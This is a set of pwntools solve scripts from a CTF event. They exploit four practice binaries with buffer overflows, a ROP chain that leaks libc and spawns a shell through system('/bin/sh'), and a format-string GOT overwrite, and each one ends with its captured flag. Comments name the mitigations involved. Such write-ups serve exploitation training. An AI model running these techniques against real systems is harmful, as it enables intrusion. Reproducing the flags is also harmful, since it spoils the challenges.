PWN
canary_cousin
from pwn import *
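# Solve script for the canary_cousin challenge: a single oversized line is sent
# to the remote service. Debug logging makes pwntools print all traffic.
context.log_level = 'debug'
r = remote('ctf.kuality.kr', 12306)
e = ELF('./canary_cousin')  # local copy of the binary; no symbol is looked up below

# Wait for the end of the first line the service prints. The pattern is a real
# newline byte, not the two characters backslash + "n", which would never match
# a newline-terminated banner.
r.recvuntil(b"\n")

# Layout implied by the offsets below (the binary itself is not shown here):
#   256 filler bytes | 0xCAFEBABE | 12 filler bytes | 32-bit code address
# NOTE(review): 0xCAFEBABE is presumably a constant guard word the program
# compares before returning - confirm against the binary. A constant guard can
# be read straight out of the executable, so it offers none of the protection
# of a per-process random stack canary (-fstack-protector).
# Byte literals keep the concatenation with p32() valid on Python 2 and 3.
pay = b"A" * 256
pay += p32(0xCAFEBABE)
pay += b"A" * 12
# Hard-coded address: presumably only meaningful for a non-PIE build of this
# exact binary - TODO confirm which function it belongs to.
pay += p32(0x08049256)
r.sendline(pay)
r.interactive()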
#KCTF{n0w_study_real_c4nary}
stage
stage
from pwn import *
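# Two-step solve script for the stage challenge. Debug logging makes pwntools
# print all traffic.
context.log_level = 'debug'
r = remote('ctf.kuality.kr', 12308)
e = ELF('./stage')
# Address of stage2 as found in the local copy of the binary.
# NOTE(review): this only matches the remote process if the binary is not
# position-independent - confirm.
stage2 = e.symbols['stage2']

# Step 1, sent after the "Attack me." prompt: 129 + 4 filler bytes followed by
# the address of stage2.
# NOTE(review): presumably 129 bytes up to the saved frame pointer, 4 bytes for
# the frame pointer, then the return address - confirm against the binary.
# A bounded read and -fstack-protector would each stop this step.
# Byte literals keep the concatenation with p32() valid on Python 2 and 3.
r.recvuntil(b"Attack me.")
pay = b"A" * 129
pay += b"A" * 4
pay += p32(stage2)
r.sendline(pay)

# Step 2, sent after the prompt ending in "me: ": 0x14 filler bytes followed by
# the 32-bit value 0xCAFEBABE.
# NOTE(review): presumably overwrites a neighbouring variable that stage2
# compares against this constant - confirm.
r.recvuntil(b"me: ")
pay = b"A" * 0x14
pay += p32(0xCAFEBABE)
r.sendline(pay)
r.interactive()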
#KCTF{c4tch_me_1f_y0u_can_lol_}
CDC
from pwn import *
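# Solve script for the CDC challenge: first payload leaks a libc address,
# second payload calls system("/bin/sh"). Debug logging prints all traffic.
context.log_level = 'debug'
r = remote("ctf.kuality.kr", 12311)
e = ELF("./CDC")
# e.libc is the libc the LOCAL binary resolves to. Every offset taken from it
# below is only correct if the remote service runs the same libc build.
libc = e.libc
# NOTE(review): presumably the address of a `pop rdi; ret` gadget in the
# binary, judging by how it is used to load the first argument - confirm.
pr = 0x0000000000400703
read_got = e.got['read']
puts_plt = e.plt['puts']
vuln = e.symbols['vuln']

# Payload 1: 0x20 + 8 filler bytes, then a chain that calls puts(read@got) and
# returns into vuln so a second input can be sent.
# NOTE(review): presumably 0x20 bytes of buffer plus 8 bytes of saved frame
# pointer - confirm. The fixed addresses imply a non-PIE binary without a
# stack protector; either mitigation would break this chain.
# Byte literals keep the concatenation with p64() valid on Python 2 and 3.
r.recvuntil(b"!!")
pay = b"A" * 0x20
pay += b"A" * 8
pay += p64(pr)
pay += p64(read_got)
pay += p64(puts_plt)
pay += p64(vuln)
r.sendline(pay)

# Read up to the first 0x7f byte and keep the last 6 bytes as the leaked
# little-endian pointer, padded to 8 bytes for u64(). The patterns must be real
# bytes (\x7f, \x00); the escaped text forms would never match and would give
# u64() the wrong length.
libc_base = u64(r.recvuntil(b'\x7f')[-6:] + b"\x00\x00") - libc.symbols['read']
system = libc.symbols['system'] + libc_base
# next(...) instead of .next() so the generator works on Python 2 and 3.
binsh = next(libc.search(b"/bin/sh")) + libc_base
# A base that is not page-aligned (low 12 bits non-zero) indicates a libc
# mismatch between the local file and the remote service.
print(hex(libc_base))

# Payload 2: same filler, then system(binsh).
pay = b"A" * 0x20
pay += b"A" * 8
# NOTE(review): presumably a bare `ret` used to keep the stack 16-byte aligned
# before entering system() - confirm.
pay += p64(0x0000000000400491)
pay += p64(pr)
pay += p64(binsh)
pay += p64(system)
r.sendline(pay)
r.interactive()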
#KCTF{C0r0n4_iS_fxxk1ng_Unc0mfort4bl3!}
FBI
from pwn import *
# Solve script for the FBI challenge: a format-string write that redirects
# puts() to vuln. Debug logging makes pwntools print all traffic.
context.log_level = 'debug'
io = remote("ctf.kuality.kr", 12307)
binary = ELF("./FBI")

# Both addresses come from the local copy of the binary.
target_fn = binary.symbols['vuln']
got_slot = binary.got['puts']

# Answer "Y" to the first prompt (ends in "N."), then wait for the "?" prompt.
io.recvuntil("N.")
io.sendline("Y")
io.recvuntil("?")

# fmtstr_payload(offset, writes): builds a format string that stores the
# address of vuln in the GOT entry of puts, with the input located at format
# argument 1.
# NOTE(review): this presumably relies on the program passing user input as the
# format argument and on a writable GOT - confirm. printf("%s", buf) removes
# the first condition; full RELRO (-Wl,-z,relro,-z,now) removes the second.
io.sendline(fmtstr_payload(1, {got_slot: target_fn}))
io.interactive()
#KCTF{d0_not_mistake_form4t_string_}
WEB
basic_sql